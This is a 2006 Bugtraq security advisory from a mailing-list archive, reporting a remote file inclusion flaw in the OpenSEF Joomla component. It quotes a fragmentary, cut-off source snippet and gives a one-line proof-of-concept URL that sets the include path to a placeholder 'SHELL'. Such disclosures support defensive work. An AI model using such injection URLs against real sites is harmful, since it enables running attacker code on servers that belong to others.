| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060819011824.1005.qmail@securityfocus.com>
Date: 19 Aug 2006 01:18:24 -0000
From: Outlaw@...a-security.net
To: bugtraq@...urityfocus.com
Subject: Modification For OpenSEF Remote file Inclusion
###########################################################################################
# Aria-Security.net Advisory #
# Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > #
# Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
# #
###########################################################################################
#Software: OpenSEF
#Attack method: Remote File Inclusion
#Description : OpenSEF is a Joomla component that extends the built-in SEF (Search Engine Friendly)
#Source:
require_once( $mosConfig_absolute_path . '/includes/sef.php' );
} else {
// Joomla!'s SEF option is turned off; revert to Joomla!'s original-style
//
************************************************************************************
#Proof of Concept:
#http://www.site.com/sef.php?mosConfig_absolute_path=SHELL
#
#----------------------------------------------------------
#
#
#Contact : Outlaw@...a-security.net
Powered by blists - more mailing lists